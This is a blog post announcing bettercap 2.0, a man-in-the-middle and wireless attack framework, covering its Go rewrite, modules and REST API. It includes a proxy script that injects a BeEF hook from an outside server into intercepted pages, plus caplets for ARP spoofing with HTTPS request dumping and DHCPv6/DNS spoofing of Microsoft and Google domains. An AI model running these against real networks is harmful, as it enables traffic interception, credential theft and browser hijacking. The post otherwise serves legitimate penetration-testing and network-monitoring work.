<!DOCTYPE html>
<html lang=en>
<head><meta name="generator" content="Hexo 3.9.0">
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="description" content="It’s with immense pleasure that I announce the release of the second generation of bettercap, a complete reimplementation of the most complete and advanced Man-in-the-Middle attack framework. This rel">
<meta name="keywords" content="bettercap,2,release,go,golang,mitm,network,wifi,ble">
<meta property="og:type" content="article">
<meta property="og:title" content="All Hail Bettercap 2.0, One Tool to Rule Them All.">
<meta property="og:url" content="https://www.evilsocket.net/2018/02/27/All-hail-bettercap-2-0-one-tool-to-rule-them-all/index.html">
<meta property="og:site_name" content="evilsocket">
<meta property="og:description" content="It’s with immense pleasure that I announce the release of the second generation of bettercap, a complete reimplementation of the most complete and advanced Man-in-the-Middle attack framework. This rel">
<meta property="og:locale" content="en">
<meta property="og:image" content="https://www.bettercap.org/img/logo.png">
<meta property="og:image" content="https://abs.twimg.com/emoji/v2/72x72/1f984.png">
<meta property="og:updated_time" content="2019-10-19T08:14:27.104Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="All Hail Bettercap 2.0, One Tool to Rule Them All.">
<meta name="twitter:description" content="It’s with immense pleasure that I announce the release of the second generation of bettercap, a complete reimplementation of the most complete and advanced Man-in-the-Middle attack framework. This rel">
<meta name="twitter:image" content="https://www.bettercap.org/img/logo.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon.ico" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon.ico">
          
        
    
    <!-- title -->
    <title>All Hail Bettercap 2.0, One Tool to Rule Them All.</title>
    <!-- styles -->
    <link rel="stylesheet" href="/css/style.css">
    <!-- persian styles -->
    
      <link rel="stylesheet" href="/css/rtl.css">
    
    <!-- rss -->
    
    
      <link rel="alternate" href="/atom.xml" title="evilsocket" type="application/atom+xml">
    
</head>

<body class="max-width mx-auto px3 ltr">    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">~/</a></li>
         
          <li><a href="/atom.xml">rss</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2018/03/14/Go-is-amazing-so-here-s-what-i-don-t-like-about-it/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2017/12/07/DIY-Portable-Secrets-Manager-with-a-RPI-Zero-and-the-ARC-Project/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://www.evilsocket.net/2018/02/27/All-hail-bettercap-2-0-one-tool-to-rule-them-all/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://www.evilsocket.net/2018/02/27/All-hail-bettercap-2-0-one-tool-to-rule-them-all/&text=All Hail Bettercap 2.0, One Tool to Rule Them All."><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://www.evilsocket.net/2018/02/27/All-hail-bettercap-2-0-one-tool-to-rule-them-all/&title=All Hail Bettercap 2.0, One Tool to Rule Them All."><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://www.evilsocket.net/2018/02/27/All-hail-bettercap-2-0-one-tool-to-rule-them-all/&is_video=false&description=All Hail Bettercap 2.0, One Tool to Rule Them All."><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=All Hail Bettercap 2.0, One Tool to Rule Them All.&body=Check out this article: https://www.evilsocket.net/2018/02/27/All-hail-bettercap-2-0-one-tool-to-rule-them-all/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://www.evilsocket.net/2018/02/27/All-hail-bettercap-2-0-one-tool-to-rule-them-all/&title=All Hail Bettercap 2.0, One Tool to Rule Them All."><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://www.evilsocket.net/2018/02/27/All-hail-bettercap-2-0-one-tool-to-rule-them-all/&title=All Hail Bettercap 2.0, One Tool to Rule Them All."><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://www.evilsocket.net/2018/02/27/All-hail-bettercap-2-0-one-tool-to-rule-them-all/&title=All Hail Bettercap 2.0, One Tool to Rule Them All."><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://www.evilsocket.net/2018/02/27/All-hail-bettercap-2-0-one-tool-to-rule-them-all/&title=All Hail Bettercap 2.0, One Tool to Rule Them All."><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://www.evilsocket.net/2018/02/27/All-hail-bettercap-2-0-one-tool-to-rule-them-all/&name=All Hail Bettercap 2.0, One Tool to Rule Them All.&description=&lt;p&gt;It’s with immense pleasure that I announce the &lt;a href=&quot;https://github.com/bettercap/bettercap/releases/tag/v2.0.0&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;release of the second generation of bettercap&lt;/a&gt;, a complete reimplementation of the most complete and advanced Man-in-the-Middle attack framework. This release not only brings MITM attacks to the next level, but it aims to be the reference framework for network monitoring (we &amp;lt;3 blueteams too), 802.11, BLE attacks and more! :D&lt;/p&gt;
&lt;center&gt;&lt;br&gt;&lt;strong style=&quot;font-size:25px&quot;&gt;&lt;br&gt;ベッターキャップ！&lt;br&gt;&lt;/strong&gt;&lt;br&gt;&lt;img width=&quot;200px&quot; src=&quot;https://www.bettercap.org/img/logo.png&quot;&gt;&lt;br&gt;&lt;/center&gt;"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#Performances"><span class="toc-number">1.</span> <span class="toc-text">Performances</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Ease-of-installation-and-Portability"><span class="toc-number">2.</span> <span class="toc-text">Ease of installation and Portability</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Old-but-brand-new"><span class="toc-number">3.</span> <span class="toc-text">Old but brand new.</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#WiFi-BLE-and-more-to-come"><span class="toc-number">4.</span> <span class="toc-text">WiFi, BLE and more to come!</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Habemus-API"><span class="toc-number">5.</span> <span class="toc-text">Habemus API</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index my4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline" style="text-transform: uppercase;">
        All Hail Bettercap 2.0, One Tool to Rule Them All.
    </h1>



    <div class="meta">
      
    <div class="postdate">
        <time datetime="2018-02-27T19:37:20.000Z" itemprop="datePublished">2018-02-27</time>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/2/">2</a>, <a class="tag-link" href="/tags/bettercap/">bettercap</a>, <a class="tag-link" href="/tags/ble/">ble</a>, <a class="tag-link" href="/tags/go/">go</a>, <a class="tag-link" href="/tags/golang/">golang</a>, <a class="tag-link" href="/tags/mitm/">mitm</a>, <a class="tag-link" href="/tags/network/">network</a>, <a class="tag-link" href="/tags/release/">release</a>, <a class="tag-link" href="/tags/wifi/">wifi</a>
    </div>


    </div>
    <div class="addthis_sharing_toolbox"></div>
  </header>

    <br/>
  

  <div class="content" itemprop="articleBody">
    <p>It’s with immense pleasure that I announce the <a href="https://github.com/bettercap/bettercap/releases/tag/v2.0.0" target="_blank" rel="noopener">release of the second generation of bettercap</a>, a complete reimplementation of the most complete and advanced Man-in-the-Middle attack framework. This release not only brings MITM attacks to the next level, but it aims to be the reference framework for network monitoring (we &lt;3 blueteams too), 802.11, BLE attacks and more! :D</p>
<center><br><strong style="font-size:25px"><br>ベッターキャップ！<br></strong><br><img width="200px" src="https://www.bettercap.org/img/logo.png"><br></center>

<a id="more"></a>
<p>The first thing I want to mention is the <a href="https://github.com/orgs/bettercap/people" target="_blank" rel="noopener">amazing team</a> that helped me debugging during endless sessions on Windows, or implemented new features that changed the tool radically, or tested, or gave ideas, or reported bugs (on GitHub, not on Twitter -.-) … <strong>you guys rock</strong> and I am so lucky, <strong>thank you</strong>.</p>
<p>Let’s get started :D</p>
<h3 id="Performances"><a href="#Performances" class="headerlink" title="Performances"></a>Performances</h3><p>As who’s following either me or <a href="https://twitter.com/bettercap" target="_blank" rel="noopener">bettercap</a> itself on Twitter probably knows, the biggest change has been in the underlying technology and framework that bettercap relies upon, we switched from a Ruby application, to a compiled Go application and this increased performances tremendously for several reasons. </p>
<p>First, we’re not victims of a <a href="https://en.wikipedia.org/wiki/Global_interpreter_lock" target="_blank" rel="noopener">GIL</a> anymore, this plus Go’s amazing concurrency mechanisms allowes bettercap 2.0 to run on low end hardware and still keep proxying hundreds of connections per second and forwarding tens of hundres of packets, while the previous version had an average of 5-6 connections/s due to how I/O requests were pooled by the interpreter while locking (aka the GIL sucks, a lot). Long story short, <strong>no more unwanted network DoS when performing a MITM attack</strong>!! F YEAH! <em>- put cool ninja move here -</em></p>
<p>Also memory and CPU usage now are extremely optimized, you can run several instances of bettercap on your Raspberry Pi (or laptop, or router, or whatever … quite literally) and your CPU cores won’t even get to 20% unless you’re attacking a huge subnet … you can monitor LAN events in real time, while scanning for WiFi access points, while attacking BLE devices nearby and all at the same time, super fast, on low end hardware … but more on this later.</p>
<p><strong>TL;DR:</strong> FU Ruby, Go is amazing, fast and scales exceptionally well. </p>
<h3 id="Ease-of-installation-and-Portability"><a href="#Ease-of-installation-and-Portability" class="headerlink" title="Ease of installation and Portability"></a>Ease of installation and Portability</h3><p>Needless to say, having <strong>a single binary with zero dependencies</strong> (or just libpcap.so on some platforms, thing that will be solved with a full static build soon) that you can just drop on a router/server/whatever and run is way better than the whole rubygems/rvm/rubyenv/whateverbs mess, while if you want to update to bleeding edge, all you have to do is install Go and then <code>go get -u github.com/bettercap/bettercap</code> … how freaking cool is that? :D</p>
<p>Oh … and this new version supports <strong>Windows, macOS, Android, Linux (arm, mips, mips64, etc)</strong> and soon iOS ^_^</p>
<h3 id="Old-but-brand-new"><a href="#Old-but-brand-new" class="headerlink" title="Old but brand new."></a>Old but brand new.</h3><p>The useful features of the old version have been ported to this new one and you will find them as <a href="https://github.com/bettercap/bettercap/wiki" target="_blank" rel="noopener">session modules</a> (really, RTFM, I spent hours writing that shit), so you’ll have <code>net.recon</code> searching for new hosts on your network while <code>net.probe</code> will keep probing for new ones, there’s our old friend <code>arp.spoof</code> with his buddies <code>tcp.proxy</code>, <code>http.proxy</code> and  <code>https.proxy</code> (now <strong>all proxies are scriptable in Javascript</strong>) with some new <code>dhcp6.spoof</code> friend. You have the <code>net.sniff</code>er of course, a <code>syn.scan</code>ner if you need and several other core modules you can use to script your interactive session while the <code>events.stream</code> will flow in front of you :D</p>
<p>Talking about scripting, as I said proxy modules are easily scriptable in JS:</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">onLoad</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">    log( <span class="string">"BeefInject loaded."</span> );</span><br><span class="line">    log(<span class="string">"targets: "</span> + env[<span class="string">'arp.spoof.targets'</span>]);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">onResponse</span>(<span class="params">req, res</span>) </span>&#123;</span><br><span class="line">    <span class="keyword">if</span>( res.ContentType.indexOf(<span class="string">'text/html'</span>) == <span class="number">0</span> )&#123;</span><br><span class="line">        <span class="keyword">var</span> body = res.ReadBody();</span><br><span class="line">        <span class="keyword">if</span>( body.indexOf(<span class="string">'&lt;/head&gt;'</span>) != <span class="number">-1</span> ) &#123;</span><br><span class="line">            res.Body = body.replace( </span><br><span class="line">                <span class="string">'&lt;/head&gt;'</span>, </span><br><span class="line">                <span class="string">'&lt;script type="text/javascript" src="http://beef-server:3000/hook.js"&gt;&lt;/script&gt;&lt;/head&gt;'</span> </span><br><span class="line">            ); </span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>Also, now we have “caplets”, which are basically like metasploit <code>.rc</code> files … enough ugly shell scripts because we don’t remember the command line for every attack scenario, now you can save your commands as <code>.cap</code> files and load them from your interactive session, let’s see a couple of interesting examples :D</p>
<p><code>http-req-dump.cap</code></p>
<p>Execute an ARP spoofing attack on the whole network (by default) or on a host (using <code>-eval</code> as described), intercept HTTP and HTTPS requests with the <code>http.proxy</code> and <code>https.proxy</code> modules and dump them using the <code>http-req-dumsp.js</code> proxy script.</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># targeting the whole subnet by default, to make it selective:</span></span><br><span class="line"><span class="comment">#</span></span><br><span class="line"><span class="comment">#   sudo ./bettercap -caplet caplets/http-req-dump.cap -eval "set arp.spoof.targets 192.168.1.64"</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># to make it less verbose</span></span><br><span class="line"><span class="comment"># events.stream off</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># discover a few hosts </span></span><br><span class="line">net.probe on</span><br><span class="line">sleep 1</span><br><span class="line">net.probe off</span><br><span class="line"></span><br><span class="line"><span class="comment"># uncomment to enable sniffing too</span></span><br><span class="line"><span class="comment"># set net.sniff.verbose false</span></span><br><span class="line"><span class="comment"># set net.sniff.local true</span></span><br><span class="line"><span class="comment"># set net.sniff.filter tcp port 443</span></span><br><span class="line"><span class="comment"># net.sniff on</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># we'll use this proxy script to dump requests</span></span><br><span class="line"><span class="built_in">set</span> https.proxy.script caplets/http-req-dump.js</span><br><span class="line"><span class="built_in">set</span> http.proxy.script caplets/http-req-dump.js</span><br><span class="line">clear</span><br><span class="line"></span><br><span class="line"><span class="comment"># go ^_^</span></span><br><span class="line">http.proxy on</span><br><span class="line">https.proxy on</span><br><span class="line">arp.spoof on</span><br></pre></td></tr></table></figure>
<p><code>netmon.cap</code></p>
<p>An example of how to use the <code>ticker</code> module, use this caplet to monitor activities on your network.</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># clear the screen and show data every second</span></span><br><span class="line"><span class="comment"># this will create a nice animation of your</span></span><br><span class="line"><span class="comment"># network activity</span></span><br><span class="line"><span class="built_in">set</span> ticker.commands <span class="string">"clear; net.show; events.show 20"</span></span><br><span class="line">ticker on</span><br><span class="line"></span><br><span class="line">net.probe on</span><br></pre></td></tr></table></figure>
<p><code>airodump.cap</code></p>
<p>Same as <code>netmon.cap</code> but will monitor for WiFi access points and clients instead of network hosts.</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># let's add some api :D</span></span><br><span class="line">include caplets/rest-api.cap</span><br><span class="line"></span><br><span class="line"><span class="built_in">set</span> $ &#123;by&#125;&#123;fw&#125;&#123;env.iface.name&#125;&#123;reset&#125; &#123;bold&#125;» &#123;reset&#125;</span><br><span class="line"><span class="built_in">set</span> ticker.commands clear; wifi.show; net.show; events.show 20</span><br><span class="line"></span><br><span class="line"><span class="comment"># uncomment to disable channel hopping</span></span><br><span class="line"><span class="comment"># set wifi.recon.channel 1</span></span><br><span class="line"></span><br><span class="line">wifi.recon on</span><br><span class="line">ticker on</span><br><span class="line">events.clear</span><br><span class="line">clear</span><br></pre></td></tr></table></figure>
<p><code>mitm6.cap</code></p>
<p><a href="https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/" target="_blank" rel="noopener">Reroute IPv4 DNS requests by using DHCPv6 replies</a>, start a HTTP server and DNS spoofer for <code>microsoft.com</code> and <code>google.com</code> (works against Windows 10 ^_^):</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># let's spoof Microsoft and Google ^_^</span></span><br><span class="line"><span class="built_in">set</span> dns.spoof.domains microsoft.com, google.com</span><br><span class="line"><span class="built_in">set</span> dhcp6.spoof.domains microsoft.com, google.com</span><br><span class="line"></span><br><span class="line"><span class="comment"># every request http request to the spoofed hosts will come to us</span></span><br><span class="line"><span class="comment"># let's give em some contents</span></span><br><span class="line"><span class="built_in">set</span> http.server.path caplets/www</span><br><span class="line"></span><br><span class="line"><span class="comment"># serve files</span></span><br><span class="line">http.server on</span><br><span class="line"><span class="comment"># redirect DNS request by spoofing DHCPv6 packets</span></span><br><span class="line">dhcp6.spoof on</span><br><span class="line"><span class="comment"># send spoofed DNS replies ^_^</span></span><br><span class="line">dns.spoof on</span><br><span class="line"></span><br><span class="line"><span class="comment"># set a custom prompt for ipv6</span></span><br><span class="line"><span class="built_in">set</span> $ &#123;by&#125;&#123;fw&#125;&#123;cidr&#125; &#123;fb&#125;&gt; &#123;env.iface.ipv6&#125; &#123;reset&#125; &#123;bold&#125;» &#123;reset&#125;</span><br><span class="line"><span class="comment"># clear the events buffer and the screen</span></span><br><span class="line">events.clear</span><br><span class="line">clear</span><br></pre></td></tr></table></figure>
<p>These are just a few basic examples, I strongly encourage you to check the <a href="https://github.com/bettercap/caplets" target="_blank" rel="noopener">caplets repository</a>.</p>
<h3 id="WiFi-BLE-and-more-to-come"><a href="#WiFi-BLE-and-more-to-come" class="headerlink" title="WiFi, BLE and more to come!"></a>WiFi, BLE and more to come!</h3><p>There’s a brand new <code>wifi.recon</code> module that will either stick to a channel or perform channel hopping, both for 2.4Ghz and 5.0Ghz frequencies, reporting useful information on what’s going on at the <strong>802.11</strong> layer, the <code>wifi.deauth</code> module will deauth clients (doh!) while the <code>net.sniff</code>er will capture WPA2 handshakes (<strong>bye bye kismet, airodump, airmon, wifite</strong>, etc!). Meanwhile, the <code>ble.recon</code> will discover every <strong>Bluetooth Low Energy</strong> device you might want to inspect with <code>ble.enum</code> or fuzz with <code>ble.write</code>. Also <code>wifi.fuzz</code> and <code>ble.fuzz</code> modules are work in progress, as well as <code>sdr.*</code> modules and others.</p>
<p>Did I mention that this works on macOS and Windows too? :D Oh, and probably your macOS has <a href="https://twitter.com/bettercap/status/967453847114407936" target="_blank" rel="noopener">a WiFi card capable of monitor mode and frames injection already</a> :D This release is taking everything to the next level, we’re not just in the ethernet, <strong>we are everywhere</strong>.</p>
<h3 id="Habemus-API"><a href="#Habemus-API" class="headerlink" title="Habemus API"></a>Habemus API</h3><p>I believe this is functionally the biggest change, or at least the one with the biggest potential: <strong>we finally have a <a href="https://github.com/bettercap/bettercap/wiki/api.rest" target="_blank" rel="noopener">REST API</a>!</strong> Imagine having a mobile client for your bettercap instance running in your dropbox, or simply imagine to develop a mobile application just by launching the Android executable, using the <code>http.server</code> module itself to serve a web UI and just create a WebView to render it … boom, easy mobile baby! :D</p>
<p>You can read every single bit of information, you can have per IP realtime network statistics, you can send commands, wait for events … the sky is the limit!!! <em>-put evil laugh here-</em></p>
<center><br><blockquote class="twitter-tweet" data-lang="en"><p lang="en" dir="ltr">There&#39;s power on that USB … kismet on a drone ftw <a href="https://t.co/CbeeyL0QtZ" target="_blank" rel="noopener">pic.twitter.com/CbeeyL0QtZ</a></p>&mdash; 🦄 (@evilsocket) <a href="https://twitter.com/evilsocket/status/941320272728264705?ref_src=twsrc%5Etfw" target="_blank" rel="noopener">December 14, 2017</a></blockquote><br><script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script><br></center>

<p>I’m so looking forward to see what users will create with this API, <strong>no more ugly Python wrappers</strong>, <strong>no more parsing complicated log files</strong>! F YEAH!!!</p>
<p>Well, that’s it … everything &lt; 2.0.0 is deprecated and not supported anymore, developement <a href="https://github.com/bettercap" target="_blank" rel="noopener">moved here</a> and there’s a <a href="https://github.com/bettercap/bettercap/wiki" target="_blank" rel="noopener">pretty decent documentation</a> that’ll help you getting started … as usual, <strong>enjoy</strong> :)</p>
<p><img src="https://abs.twimg.com/emoji/v2/72x72/1f984.png"></p>

  </div>
</article>

    <div class="blog-post-comments">
        <div id="disqus_thread">
            <noscript>Please enable JavaScript to view the comments.</noscript>
        </div>
    </div>



    </div>
    
      <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">~/</a></li>
         
          <li><a href="/atom.xml">rss</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#Performances"><span class="toc-number">1.</span> <span class="toc-text">Performances</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Ease-of-installation-and-Portability"><span class="toc-number">2.</span> <span class="toc-text">Ease of installation and Portability</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Old-but-brand-new"><span class="toc-number">3.</span> <span class="toc-text">Old but brand new.</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#WiFi-BLE-and-more-to-come"><span class="toc-number">4.</span> <span class="toc-text">WiFi, BLE and more to come!</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Habemus-API"><span class="toc-number">5.</span> <span class="toc-text">Habemus API</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://www.evilsocket.net/2018/02/27/All-hail-bettercap-2-0-one-tool-to-rule-them-all/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://www.evilsocket.net/2018/02/27/All-hail-bettercap-2-0-one-tool-to-rule-them-all/&text=All Hail Bettercap 2.0, One Tool to Rule Them All."><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://www.evilsocket.net/2018/02/27/All-hail-bettercap-2-0-one-tool-to-rule-them-all/&title=All Hail Bettercap 2.0, One Tool to Rule Them All."><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://www.evilsocket.net/2018/02/27/All-hail-bettercap-2-0-one-tool-to-rule-them-all/&is_video=false&description=All Hail Bettercap 2.0, One Tool to Rule Them All."><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=All Hail Bettercap 2.0, One Tool to Rule Them All.&body=Check out this article: https://www.evilsocket.net/2018/02/27/All-hail-bettercap-2-0-one-tool-to-rule-them-all/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://www.evilsocket.net/2018/02/27/All-hail-bettercap-2-0-one-tool-to-rule-them-all/&title=All Hail Bettercap 2.0, One Tool to Rule Them All."><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://www.evilsocket.net/2018/02/27/All-hail-bettercap-2-0-one-tool-to-rule-them-all/&title=All Hail Bettercap 2.0, One Tool to Rule Them All."><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://www.evilsocket.net/2018/02/27/All-hail-bettercap-2-0-one-tool-to-rule-them-all/&title=All Hail Bettercap 2.0, One Tool to Rule Them All."><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://www.evilsocket.net/2018/02/27/All-hail-bettercap-2-0-one-tool-to-rule-them-all/&title=All Hail Bettercap 2.0, One Tool to Rule Them All."><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://www.evilsocket.net/2018/02/27/All-hail-bettercap-2-0-one-tool-to-rule-them-all/&name=All Hail Bettercap 2.0, One Tool to Rule Them All.&description=&lt;p&gt;It’s with immense pleasure that I announce the &lt;a href=&quot;https://github.com/bettercap/bettercap/releases/tag/v2.0.0&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;release of the second generation of bettercap&lt;/a&gt;, a complete reimplementation of the most complete and advanced Man-in-the-Middle attack framework. This release not only brings MITM attacks to the next level, but it aims to be the reference framework for network monitoring (we &amp;lt;3 blueteams too), 802.11, BLE attacks and more! :D&lt;/p&gt;
&lt;center&gt;&lt;br&gt;&lt;strong style=&quot;font-size:25px&quot;&gt;&lt;br&gt;ベッターキャップ！&lt;br&gt;&lt;/strong&gt;&lt;br&gt;&lt;img width=&quot;200px&quot; src=&quot;https://www.bettercap.org/img/logo.png&quot;&gt;&lt;br&gt;&lt;/center&gt;"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

    
    <footer id="footer">
  <div class="footer-left">
    Copyright &copy; 2019 Simone Margaritelli
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">~/</a></li>
         
          <li><a href="/atom.xml">rss</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

</body>
</html>
<!-- styles -->
<link rel="stylesheet" href="/lib/font-awesome/css/fontawesome-all.min.css">
<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">

<!-- jquery -->
<script src="/lib/jquery/jquery.min.js"></script>
<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>
<script src="/js/main.js"></script>
<!-- search -->

<!-- Google Analytics -->

    <script type="text/javascript">
